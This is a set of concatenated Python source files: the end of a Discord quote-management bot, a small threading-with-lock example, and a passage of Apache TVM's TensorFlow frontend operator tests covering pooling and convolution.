if quote_library.get(name) is None:
await ctx.send("The person you have searched for is not a quotable person\n"
"Please check the spelling of the name and ensure it matches with one of the following:\n"
+ (str(getlist(quote_library))) +
f"\nOtherwise, please add this person to the list of quotable people using .add")
else:
await ctx.send(f"{name} has been quoted {len(quote_library.get(name))} times")
# Remove Command that removes a specific quote using the number assigned to the quote
@client.command(aliases=["Remove", "REMOVE", "r", "R"])
async def remove(ctx, *, info):
infolist = [x.strip() for x in info.split('~')]
if quote_library.get(infolist[-1]) is None:
await ctx.send("The person you have searched for is not a quotable person\n"
"Please check the spelling of the name and ensure it matches with one of the following:\n"
+ (str(getlist(quote_library))) +
f"\nOtherwise, please add this person to the list of quotable people using .add")
else:
del quote_library.get(infolist[-1])[(int(infolist[0])-1)]
await ctx.send("The quote has been removed")
# Clear Command that removes all quotes from a person's list
@client.command(aliases=["Clear", "CLEAR", "c", "C"])
async def clear(ctx, *, name):
if quote_library.get(name) is None:
await ctx.send("The person you have searched for is not a quotable person")
else:
quote_library.get(name).clear()
await ctx.send(f"{name}'s quotes have been cleared")
client.run('token')
|
same_class_with_lock.py
|
#!/usr/bin/env python
# coding: utf-8
import threading
import time
class Controller(threading.Thread):
def __init__(self, p1):
threading.Thread.__init__(self)  # initialise the Thread base class so start() also works
self.p1 = p1
self.lock = threading.Lock()
def run(self):
print('run')
t1 = threading.Thread(target=self.new_thread)
t1.start()
# First process
while True:
time.sleep(1)
with self.lock:
self.p1 = 'toto'
time.sleep(0.1)
print(self.unified_function('controller'))
def new_thread(self):
# Second process
while True:
time.sleep(1)
with self.lock:
self.p1 = 'tata'
time.sleep(0.5)
print(self.unified_function('new_thread'))
def unified_function(self, user):
return 'data from : '+self.p1+' and '+user
if __name__ == "__main__":
p1 = 'toto'
cont = Controller(p1)
cont.run()
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
    """Flatten a TVM runtime object (NDArray, ADT, or constructor value) into a list of numpy arrays."""
if isinstance(o, tvm.nd.NDArray):
return [o.numpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].numpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
"""Generic function to compile on relay and execute on tvm"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).numpy() for i in range(num_output)]
return tvm_output_list
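# run_tvm_graph dispatches on `mode`: "debug" runs the Relay debug executor
# (interpreter), "vm" compiles for and runs on the Relay VirtualMachine
# (optionally after a save/load round trip when serialize=True), and any other
# value builds the module with relay.build and runs it on the graph executor.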
def run_tf_graph(sess, input_data, input_node, output_node):
"""Generic function to execute tensorflow"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
)
            # Since output names from the TensorFlow and Relay runs do not match exactly,
            # only the first len(tf_output) outputs are compared.
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
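# Illustrative sketch (not part of the original suite): most of the op tests
# below follow the same pattern -- build a small TF graph, apply the op under
# test, then hand the input data and tensor names to compare_tf_with_tvm. The
# ReLU op and the "Relu:0" output name here are only an assumed example.
def _example_relu_test_pattern():
    data = np.random.uniform(-1, 1, size=(1, 8)).astype("float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=data.shape, dtype="float32")
        nn_ops.relu(in_data)
        compare_tf_with_tvm(data, "Placeholder:0", "Relu:0")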
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
"""One iteration of pool operation with given shapes and attributes"""
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
"""Pooling with dynamic height and width dimensions."""
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
"""Pooling"""
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
    # Initialize the input tensor with an array of incrementing numbers starting from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
    # Initialize the input tensor with an array of incrementing numbers starting from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution transpose with given shapes and attributes"""
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
"""One iteration of biasadd with given shapes and attributes"""
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
    # Initialize the input tensor with an array of incrementing numbers starting from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
